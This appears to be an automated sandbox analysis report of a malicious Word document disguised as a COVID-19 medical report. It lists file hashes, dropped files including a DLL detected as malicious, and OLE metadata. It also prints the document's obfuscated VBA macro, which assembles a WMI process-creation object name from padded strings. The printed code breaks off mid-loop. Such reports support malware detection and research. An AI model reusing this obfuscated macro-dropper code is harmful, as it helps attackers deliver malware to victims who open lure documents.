SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\IU-8549 Medical report COVID-19.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Thu Feb 18 05:56:32 2021, length=172032, window=hide
Category:	dropped
Size (bytes):	2238
Entropy (8bit):	4.557455295271099
Encrypted:	false
SSDEEP:	48:8mm/XT0jF1oe/7JO8e/k+Qh2mm/XT0jF1oe/7JO8e/k+Q/:85/XojF1oe08e8+Qh25/XojF1oe08e89
MD5:	C8E751FB9A57C3D271680235A84491E9
SHA1:	5DD21C8CCDB4B52C1B8790B285107DC734206C61
SHA-256:	790F5177DB2CC779F97704E7609BF1FF5431F91612C00167F1BD1056A59755DB
SHA-512:	77B591590030F43CF9388D5634DBBAA8F90C4FC50F2A05F4FF6D26527CCD6B634D59431B7322BA4E6F0DFD9B139410562F24F706625757D185BE32B81B6F91EC
Malicious:	false
Reputation:	low
Preview:	L..................F.... ....7h..{...7h..{...%.0.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....RR.7 .IU-854~1.DOC..t.......Q.y.Q.y...8.....................I.U.-.8.5.4.9. .M.e.d.i.c.a.l. .r.e.p.o.r.t. .C.O.V.I.D.-.1.9...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\818225\Users.user\Desktop\IU-8549 Medical report COVID-19.doc.:.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.U.-.8.5.4.9. .M.e.d.i.c.a.l. .r.e.p.o.r.t. .C.O.V.I.D.-.1.9...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	131
Entropy (8bit):	4.987781475184533
Encrypted:	false
SSDEEP:	3:M1R70ILQSjmIfFu4o09dE0ILQSjmIfFu4omX1R70ILQSjmIfFu4ov:Mb0ILyIfjnE0ILyIfj10ILyIfjy
MD5:	C9F0C74D1BCAF808FB96B6D9DD400032
SHA1:	A89073DBBDD26CFE3DA92680022E006B5FB69EF2
SHA-256:	1DDF70A865248BDA1FC8C3815FE3DE223492A35EDCA8E8BB5B052DE69B87C262
SHA-512:	BBBF845983C9AA5E2FA9F25A99ACABD032118CD13E7A097C4E4B07F7B855AF4F10616368C7C0D88AC4B35FA386FDB3BC3E6A7A4BBBDC759A326CDD24967F15FD
Malicious:	false
Preview:	[doc]..IU-8549 Medical report COVID-19.LNK=0..IU-8549 Medical report COVID-19.LNK=0..[doc]..IU-8549 Medical report COVID-19.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BI6L7G7Y2QOZYJA29CWB.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5868168732363137
Encrypted:	false
SSDEEP:	96:chQCsMqiqvsqvJCwoQz8hQCsMqiqvsEHyqvJCworezv1YfHvf8OslUVKIu:cyvoQz8yTHnorezvQf8OiIu
MD5:	8DF3597FC8CA92C4E63FFBEB821B9AD1
SHA1:	EE4A843C8CAE2C74010E27B1DE46913B9EA53AFF
SHA-256:	23C71143C88BD3BCCC963DA5A454A77166EB32DC11A750897D414511EA606BED
SHA-512:	8AE71FDB265766BA88E1316F22C23328159A89D111479FC056F7D6EA4D6AA3AAA3F7E559BF49AEF2054BC70AAAD721E606126D479563C69B6B6D3F620E96823F
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\Desktop\~$-8549 Medical report COVID-19.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	348504
Entropy (8bit):	4.292535319096508
Encrypted:	false
SSDEEP:	3072:avA1p08RqEQAIVEd2gG/vNlo0JFx/pANyCm0PQEKR/JnXHWP:a206xWgGxLxWN40PDKR/JnX2P
MD5:	1A94E3824866ACD3C565215AAC04C69B
SHA1:	F91A9CADB09F22A22B93732E09FBAA5DC8B6901B
SHA-256:	ABCFC9CD109EB8B287C9544663CE707DD9FA1AF0FC6CA61F67708F60CD23A63F
SHA-512:	6B68051ADB5C9F532EE5F43DD49E730418AF9F92125DDEE9D2CFFA4B0148AAF8F73046EDDB335BD12AFE47ABE13A15AB6B6C02BB70F2758C12A6AE607BB39620
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 46%, Browse Antivirus: ReversingLabs, Detection: 93%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.`...........!...2.@..........P........P...............................................................................`..d....................<..X............................................................a..`............................text....6.......8.................. ..`.rdata..W....P.......<..............@..@.data........`.......>..............@....text4.......p.......B..............@....text8..d....`.......0.............. ..@.text7..d....p.......2.............. ..@.text6..d............4.............. ..@.text5..d............6.............. ..@.reloc...............8..............@..B........................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Rubber Berkshire Credit Card Account generate engage Cambridgeshire Uganda Shilling Auto Loan Account object-oriented online Lead, Author: Sara Ozuna, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 22 16:11:00 2021, Last Saved Time/Date: Fri Jan 22 16:11:00 2021, Number of Pages: 1, Number of Words: 3367, Number of Characters: 19194, Security: 8
Entropy (8bit):	6.723891422776511
TrID:	Microsoft Word document (32009/1) 79.99% Generic OLE2 / Multistream Compound File (8008/1) 20.01%
File name:	IU-8549 Medical report COVID-19.doc
File size:	171008
MD5:	be33bce1030d367cf23727936fc1fbfd
SHA1:	2731bb3115108d14d2a4d5abd49aef32468961c9
SHA256:	843ac5a5070a8f77eeb150cf7963ea5a66dd5763b0e3ac3d775333219fa5b773
SHA512:	fb9a8d8e1ee8876e79df1702775867bba0406bcfefb102a738a5acbce8e5cde21d24e97b7214fcd6a524c31b12b64f5ff764da17e30b2a4c1a131d328fa85c1a
SSDEEP:	3072:jwT4OAEDCkss1NkYtWr7Agf5k9jySTdcrrXyQBsc0vWJVi4IrwVuYbdYPeFmfG5i:jwT4OAEDCkss1NkYtWr7Agf5k9jyTPI3
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "IU-8549 Medical report COVID-19.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:
Subject:	Rubber Berkshire Credit Card Account generate engage Cambridgeshire Uganda Shilling Auto Loan Account object-oriented online Lead
Author:	Sara Ozuna
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:
Revion Number:	1
Total Edit Time:	0
Create Time:	2021-01-22 16:11:00
Last Saved Time:	2021-01-22 16:11:00
Number of Pages:	1
Number of Words:	3367
Number of Characters:	19194
Creating Application:	Microsoft Office Word
Security:	8

Document Summary
Document Code Page:	-535
Number of Lines:	159
Number of Paragraphs:	45
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	917504

Streams with VBA

VBA File Name: Dulz0g2a3qqdjsty7, Stream Size: 25190

General
Stream Path:	Macros/VBA/Dulz0g2a3qqdjsty7
VBA File Name:	Dulz0g2a3qqdjsty7
Stream Size:	25190
Data ASCII:	. . . . . . . . . l . . . . . . . . . . . . . . . t . . . . H . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 6c 10 00 00 d4 00 00 00 b8 01 00 00 ff ff ff ff 74 10 00 00 e0 48 00 00 00 00 00 00 01 00 00 00 fa 62 ff 18 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
aOIKG
FgPjRJEIR,
tLOwC
SeKqFAFNv
Until
OYlTFEt
msHCWHCAt
GnnqWGPGJ
gYFIC
NswmEPELA.Range
vrXECqWF.Range
EeuJHEHF
PyJkHIE,
aMiqITVGL
lcxHPB:
vajlM
okSXVy
AtZVIBkE
GcgMIFBS
QqMgHpfGB,
qucrJCEBy,
QntVIZAdD,
OCclfDa
qPVaAz
piVqgYJ(iPrzI)
(rqaveCGz
cxLJIGiD
USfrGE
beeZpf:
rqaveCGz,
pWDVU
BfQqFX,
(FfmNDT
FTLaqR
WDyUCG
KUSkBEC,
QGvuB
MidB$(vLWhdu,
TNoCFZI
hSmgtNpln
njcnja
(KUSkBEC
UBound(QGvuB)
wMDcH
msHCWHCAt(PJULJBb)
(OnZyDDGUB
immQJ:
rpBOJCg,
zxmKGAJHA.Range
PyJkHIE
eKFHKDJw
(USfrGE
piVqgYJ
lPbZa
FkmBAH:
QqMgHpfGB
mvXsJDCI
sXjiJI
CuSGXNGI
iXiRFIE
IcgiD
omukcDDAB
VSeBJC
MidB$(KWoNDrI,
UBound(ugTHSC)
IuiADKc
FrGcEy
NswmEPELA
kGKlCH(TWSLHrEJ)
PJULJBb,
WotFy
PJULJBb
euviCGGE
MidB$(QGvuB,
aXyHAY(rjilFB)
iPrzI,
qLAiGc(tLOwC)
fQyMHGCJ.Range
NIEFpmJ
UBound(qLAiGc)
UBound(sXjiJI)
BygJBD
FfmNDT
hXmVsAI
NDrVK:
tFqUPL
(TyLaL
tLOwC,
cfmpCCej
IZBck
SeegFDA
HaMJF,
kGKlCH()
rGxSBFAm
lroNB.Range
ezXAHG
lPbZa.Range
wjnsc
LxgTE(mvXsJDCI)
uwljH
UXwvP
FTLaqR,
YxuWVAC
rjilFB
ASxkJEBEJ,
nnjasd,
Resume
SeochBB:
MidB$(gPiUJUCJ,
(tLOwC
UApNCTSB()
cEEUvC,
tksEqFXE
dQimAHCD
(qucrJCEBy
avenCHqCM:
MidB$(euviCGGE,
HtbOAHKIF
KboWpC
MidB$(sXjiJI,
hSmgtNpln:
xeQqnwEGH.Range
cxLJIGiD(FrGcEy)
MidB$(piVqgYJ,
FfmNDT,
ZBLQItWK,
PAPyDG
qLAiGc()
HZrrCCPJ:
uvWvDCq
vLWhdu
uifQEJ
(lZIWVW
ugTHSC()
InWYD
GnnqWGPGJ,
WEjBx
WEjBx,
UBound(msHCWHCAt)
WygyQ
FlHJG
(QqMgHpfGB
SJaMAW
WystvJDiH
XFQcotHEl
HmdtGfbHA
WotFy,
(ZBLQItWK
(PyJkHIE
lkPbvChTB.Range
MidB$(cxLJIGiD,
beoayAGAs
cQXOHIGG
KWoNDrI
fHEAXGB
UeaVqCIF
MidB$(CuSGXNGI,
MidB$(UApNCTSB,
ORvhuHGGD
(FrGcEy
hrhpx
HoycEGGS
lcxHPB
MidB$(msHCWHCAt,
PlYykHypI
MidB$(okSXVy,
(WotFy
mbpdgB
bkRdqzBB
MidB$(ugTHSC,
TyLaL
rpBOJCg
(TWSLHrEJ
TZIFFtB.Range
ORvhuHGGD,
dKpjABOAD
EWwbyEvG.Range
EBcorGpdB
TWSLHrEJ
(iPrzI
jKqFehtZP
FgPjRJEIR
avenCHqCM
NlrKo,
VqFNFwx
UBound(YRistJGeF)
HaMJF
nBWRH
UBound(KWoNDrI)
bKFVL
YEfXME:
hfACeBO
WystvJDiH.Range
gPiUJUCJ()
HYflxGv
eKFHKDJw,
HsCTGA
zvYxeGGBh:
OYlTFEt:
hXmVsAI()
GcgMIFBS,
hXmVsAI(FTLaqR)
txnfIE
BkCHJMwO
MidB$(qLAiGc,
dNKFVFD:
zxmKGAJHA
VADSpA
YEXZi
KWoNDrI(GnnqWGPGJ)
UBound(CuSGXNGI)
UBound(LxgTE)
UvPjdXBJH
vLWhdu(NlrKo)
dPnKGaIH
YEfXME
NlrKo
Mid(Application.Name,
bKFVL.Range
euviCGGE()
qLAiGc
kfglYjE:
piVqgYJ()
rqaveCGz
eGrznOJJ
SeegFDA,
ZBLQItWK
eFdbX:
kVnSBBJ
cEEUvC
FkmBAH
CBOhDJ
sXjiJI(ASxkJEBEJ)
(XFQcotHEl
YeeasmCg
XFQcotHEl,
VADSpA.Range
RSCoIAgA
MiRGG
(QntVIZAdD
itfbnIkB
UBound(vLWhdu)
qpYICE
ipaAe
DEdCJACpO
nZrgFol
(FTLaqR
PTiWFW
sXjiJI()
JPAoPL
aXyHAY
ydHfQ
WolyDl
QntVIZAdD
bjyQsJ
(NlrKo
lZIWVW,
"sadsaccc"
"sasdsacc"
QGvuB()
GRIeHCUTC:
uwljH,
rjilFB,
msHCWHCAt()
UBound(cxLJIGiD)
iXiRFIE(BfQqFX)
IwzPAgE
YRistJGeF(MDLMBAHzC)
euviCGGE(PyJkHIE)
fgxZE
lMxaZeHEA
rdwmZFK,
gPiUJUCJ(mXwueE)
MidB$(ipaAe,
arYPBNC
vLWhdu()
VqFNFwx.Range
MidB$(hXmVsAI,
UBound(euviCGGE)
lIOoEHE
UCtihtI
tTUuY
(HaMJF
JQyfEHCFH:
GRIeHCUTC
(qpYICE
ASxkJEBEJ
VB_Name
Word.Paragraph
(rjilFB
UBound(piVqgYJ)
YRistJGeF()
(rpBOJCg
lkPbvChTB
(mbpdgB
vajlM:
MidB$(YRistJGeF,
JQyfEHCFH
rdwmZFK
MDLMBAHzC
Content
MIQyJC
SysLpJnC
eFdbX
MidB$(aXyHAY,
LxgTE
PwKrSn
KWoNDrI()
NRXsPIGD
mXwueE,
(uwljH
(ASxkJEBEJ
UQnFD
(cEEUvC
RrOlGJCr
hfACeBO:
(PJULJBb
mXwueE
gPiUJUCJ
MidB$(iXiRFIE,
ipaAe()
UBound(gPiUJUCJ)
FWzgiHG
(MDLMBAHzC
iPrzI
dNKFVFD
kGKlCH
(mvXsJDCI
CuSGXNGI()
bJfJIBEBC
aXyHAY()
HoycEGGS.Range
IZBck,
TZIFFtB
IPiQsIN
KUSkBEC
beeZpf
WmhUJ
UBound(kGKlCH)
TPpjQ:
UApNCTSB(TyLaL)
YRistJGeF
UBound(UApNCTSB)
UBound(ipaAe)
okSXVy(rdwmZFK)
MDLMBAHzC,
BfQqFX
VJBiOEoB
rGxSBFAm.Range
okSXVy()
(rdwmZFK
BvwhhQNB
(IZBck
oVIlzvB
UQnFD.Range
FoVpJCArD
iXiRFIE()
OnZyDDGUB,
OJlopx
yroaOGI
jKqFehtZP.Range
NDrVK
TPpjQ
USfrGE,
Len(skuwd))
qpYICE,
MeewHjDR
MidB$(kGKlCH,
CBOhDJ.Range
(WEjBx
XcIBFVflC
OnZyDDGUB
RrOlGJCr:
uJJmytp
MIQyJC.Range
EOBHCBBF
TyLaL,
ukURCshB
mbpdgB,
(ORvhuHGGD
aetYHHHFP
EWwbyEvG
CuSGXNGI(KUSkBEC)
noYAHFJkx
ugTHSC(XFQcotHEl)
(mXwueE
(BfQqFX
ipaAe(SeegFDA)
TWSLHrEJ,
vrXECqWF
(SeegFDA
dOQMo
YMkAJIp
wONTemEFr
(eKFHKDJw
UBound(hXmVsAI)
immQJ
fQyMHGCJ
UBound(okSXVy)
Mid(skuwd,
OCclfDa.Range
cxLJIGiD()
zvYxeGGBh
lroNB
UBound(aXyHAY)
dBfQDv
LxgTE()
lZIWVW
UBound(iXiRFIE)
HZrrCCPJ
SeochBB
Error
xeQqnwEGH
Puaskfwqwxz_
Attribute
FrGcEy,
kfglYjE
MoAcLJ
yFQRXd
Function
lSvxKAE
vJOKJuk
mvXsJDCI,
qucrJCEBy
XbFndWSCC
MidB$(LxgTE,
(GcgMIFBS
CYtYuIW
UApNCTSB
nnjasd
IIShQCGJH
(GnnqWGPGJ
nYfpXuDyH
QGvuB(WotFy)
zIlgcDbCD
ugTHSC
(FgPjRJEIR
skuwd
fLcUFFJA

VBA Code

Attribute VB_Name = "Dulz0g2a3qqdjsty7"
Function Ekyjujey2miwyla()
   GoTo FkmBAH
Set uifQEJ = IcgiD
    Dim uwljH, rdwmZFK, OJlopx As Long
    Dim zxmKGAJHA As Word.Paragraph
    Dim okSXVy() As Byte
    For Each zxmKGAJHA In Sky5mdbfre3xe7q8.Paragraphs
        okSXVy = zxmKGAJHA.Range
        dscc = "sadsaccc" & zxmKGAJHA.Range
        rdwmZFK = UBound(okSXVy) - 1
        uwljH = 0
Set EeuJHEHF = wONTemEFr
        Do Until rdwmZFK > rdwmZFK
            If okSXVy(rdwmZFK) = 46 Or rdwmZFK = rdwmZFK Then
                dscc = "sasdsacc" & (uwljH / 2) + 1 & " to " & (rdwmZFK / 2) + 1 & MidB$(okSXVy, uwljH + 1, rdwmZFK - uwljH + 3)
                uwljH = rdwmZFK + 2
            End If
            rdwmZFK = rdwmZFK + 2
        Loop
    Next
FkmBAH:
skuwd = R94sbg0kp8g5 + Sky5mdbfre3xe7q8 . Content + Puaskfwqwxz_
   GoTo dNKFVFD
Set WDyUCG = HmdtGfbHA
    Dim FgPjRJEIR, PJULJBb, MiRGG As Long
    Dim lkPbvChTB As Word.Paragraph
    Dim msHCWHCAt() As Byte
    For Each lkPbvChTB In Sky5mdbfre3xe7q8.Paragraphs
        msHCWHCAt = lkPbvChTB.Range
        dscc = "sadsaccc" & lkPbvChTB.Range
        PJULJBb = UBound(msHCWHCAt) - 1
        FgPjRJEIR = 0
Set DEdCJACpO = kVnSBBJ
        Do Until PJULJBb > PJULJBb
            If msHCWHCAt(PJULJBb) = 46 Or PJULJBb = PJULJBb Then
                dscc = "sasdsacc" & (FgPjRJEIR / 2) + 1 & " to " & (PJULJBb / 2) + 1 & MidB$(msHCWHCAt, FgPjRJEIR + 1, PJULJBb - FgPjRJEIR + 3)
                FgPjRJEIR = PJULJBb + 2
            End If
            PJULJBb = PJULJBb + 2
        Loop
    Next
dNKFVFD:
wjnsc = "x [ sh bpx [ sh b"
Eh1e1l6qq9w6uz3 = "x [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b"
   GoTo RrOlGJCr
Set arYPBNC = ydHfQ
    Dim rqaveCGz, TWSLHrEJ, tTUuY As Long
    Dim WystvJDiH As Word.Paragraph
    Dim kGKlCH() As Byte
    For Each WystvJDiH In Sky5mdbfre3xe7q8.Paragraphs
        kGKlCH = WystvJDiH.Range
        dscc = "sadsaccc" & WystvJDiH.Range
        TWSLHrEJ = UBound(kGKlCH) - 1
        rqaveCGz = 0
Set VJBiOEoB = PwKrSn
        Do Until TWSLHrEJ > TWSLHrEJ
            If kGKlCH(TWSLHrEJ) = 46 Or TWSLHrEJ = TWSLHrEJ Then
                dscc = "sasdsacc" & (rqaveCGz / 2) + 1 & " to " & (TWSLHrEJ / 2) + 1 & MidB$(kGKlCH, rqaveCGz + 1, TWSLHrEJ - rqaveCGz + 3)
                rqaveCGz = TWSLHrEJ + 2
            End If
            TWSLHrEJ = TWSLHrEJ + 2
        Loop
    Next
RrOlGJCr:
Czs06fohvxu97 = "x [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh b"
   GoTo YEfXME
Set FlHJG = lSvxKAE
    Dim eKFHKDJw, GnnqWGPGJ, JPAoPL As Long
    Dim HoycEGGS As Word.Paragraph
    Dim KWoNDrI() As Byte
    For Each HoycEGGS In Sky5mdbfre3xe7q8.Paragraphs
        KWoNDrI = HoycEGGS.Range
        dscc = "sadsaccc" & HoycEGGS.Range
        GnnqWGPGJ = UBound(KWoNDrI) - 1
        eKFHKDJw = 0
Set aMiqITVGL = WolyDl
        Do Until GnnqWGPGJ > GnnqWGPGJ
            If KWoNDrI(GnnqWGPGJ) = 46 Or GnnqWGPGJ = GnnqWGPGJ Then
                dscc = "sasdsacc" & (eKFHKDJw / 2) + 1 & " to " & (GnnqWGPGJ / 2) + 1 & MidB$(KWoNDrI, eKFHKDJw + 1, GnnqWGPGJ - eKFHKDJw + 3)
                eKFHKDJw = GnnqWGPGJ + 2
            End If
            GnnqWGPGJ = GnnqWGPGJ + 2
        Loop
    Next
YEfXME:
Bte4bjpfxry = "wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh b"
   GoTo kfglYjE
Set uvWvDCq = YMkAJIp
    Dim cEEUvC, WotFy, dQimAHCD As Long
    Dim NswmEPELA As Word.Paragraph
    Dim QGvuB() As Byte
    For Each NswmEPELA In Sky5mdbfre3xe7q8.Paragraphs
        QGvuB = NswmEPELA.Range
        dscc = "sadsaccc" & NswmEPELA.Range
        WotFy = UBound(QGvuB) - 1
        cEEUvC = 0
Set itfbnIkB = nZrgFol
        Do Until WotFy > WotFy
            If QGvuB(WotFy) = 46 Or WotFy = WotFy Then
                dscc = "sasdsacc" & (cEEUvC / 2) + 1 & " to " & (WotFy / 2) + 1 & MidB$(QGvuB, cEEUvC + 1, WotFy - cEEUvC + 3)
                cEEUvC = WotFy + 2
            End If
            WotFy = WotFy + 2
        Loop
    Next
kfglYjE:
Dj2098s6rmd = "x [ sh bx [ sh b" + Mid(Application.Name, 60 / 10, 1) + "x [ sh bx [ sh b"
   GoTo TPpjQ
Set qPVaAz = NRXsPIGD
    Dim qpYICE, iPrzI, KboWpC As Long
    Dim jKqFehtZP As Word.Paragraph
    Dim piVqgYJ() As Byte
    For Each jKqFehtZP In Sky5mdbfre3xe7q8.Paragraphs
        piVqgYJ = jKqFehtZP.Range
        dscc = "sadsaccc" & jKqFehtZP.Range
        iPrzI = UBound(piVqgYJ) - 1
        qpYICE = 0
Set lMxaZeHEA = IwzPAgE
        Do Until iPrzI > iPrzI
            If piVqgYJ(iPrzI) = 46 Or iPrzI = iPrzI Then
                dscc = "sasdsacc" & (qpYICE / 2) + 1 & " to " & (iPrzI / 2) + 1 & MidB$(piVqgYJ, qpYICE + 1, iPrzI - qpYICE + 3)
                qpYICE = iPrzI + 2
            End If
            iPrzI = iPrzI + 2
        Loop
    Next
TPpjQ:
Acanctsdu93 = Bte4bjpfxry + Dj2098s6rmd + Czs06fohvxu97 + wjnsc + Eh1e1l6qq9w6uz3
   GoTo vajlM
Set XbFndWSCC = HtbOAHKIF
    Dim QntVIZAdD, XFQcotHEl, CYtYuIW As Long
    Dim rGxSBFAm As Word.Paragraph
    Dim ugTHSC() As Byte
    For Each rGxSBFAm In Sky5mdbfre3xe7q8.Paragraphs
        ugTHSC = rGxSBFAm.Range
        dscc = "sadsaccc" & rGxSBFAm.Range
        XFQcotHEl = UBound(ugTHSC) - 1
        QntVIZAdD = 0
Set YxuWVAC = BvwhhQNB
        Do Until XFQcotHEl > XFQcotHEl
            If ugTHSC(XFQcotHEl) = 46 Or XFQcotHEl = XFQcotHEl Then
                dscc = "sasdsacc" & (QntVIZAdD / 2) + 1 & " to " & (XFQcotHEl / 2) + 1 & MidB$(ugTHSC, QntVIZAdD + 1, XFQcotHEl - QntVIZAdD + 3)
                QntVIZAdD = XFQcotHEl + 2
            End If
            XFQcotHEl = XFQcotHEl + 2
        Loop
    Next
vajlM:
Yw3n4ijej_c5k = Bcdtdfsryv3bc(Acanctsdu93)
   GoTo OYlTFEt
Set omukcDDAB = ezXAHG
    Dim WEjBx, ASxkJEBEJ, InWYD As Long
    Dim bKFVL As Word.Paragraph
    Dim sXjiJI() As Byte
    For Each bKFVL In Sky5mdbfre3xe7q8.Paragraphs
        sXjiJI = bKFVL.Range
        dscc = "sadsaccc" & bKFVL.Range
        ASxkJEBEJ = UBound(sXjiJI) - 1
        WEjBx = 0
Set SysLpJnC = pWDVU
        Do Until ASxkJEBEJ > ASxkJEBEJ
            If sXjiJI(ASxkJEBEJ) = 46 Or ASxkJEBEJ = ASxkJEBEJ Then
                dscc = "sasdsacc" & (WEjBx / 2) + 1 & " to " & (ASxkJEBEJ / 2) + 1 & MidB$(sXjiJI, WEjBx + 1, ASxkJEBEJ - WEjBx + 3)
                WEjBx = ASxkJEBEJ + 2
            End If
            ASxkJEBEJ = ASxkJEBEJ + 2
        Loop
    Next
OYlTFEt:
Set H2lplpiprsq2y = CreateObject(Yw3n4ijej_c5k)
   GoTo avenCHqCM
Set nYfpXuDyH = HYflxGv
    Dim HaMJF, tLOwC, MeewHjDR As Long
    Dim OCclfDa As Word.Paragraph
    Dim qLAiGc() As Byte
    For Each OCclfDa In Sky5mdbfre3xe7q8.Paragraphs
        qLAiGc = OCclfDa.Range
        dscc = "sadsaccc" & OCclfDa.Range
        tLOwC = UBound(qLAiGc) - 1
        HaMJF = 0
Set BkCHJMwO = dBfQDv
        Do Until tLOwC > tLOwC
            If qLAiGc(tLOwC) = 46 Or tLOwC = tLOwC Then
                dscc = "sasdsacc" & (HaMJF / 2) + 1 & " to " & (tLOwC / 2) + 1 & MidB$(qLAiGc, HaMJF + 1, tLOwC - HaMJF + 3)
                HaMJF = tLOwC + 2
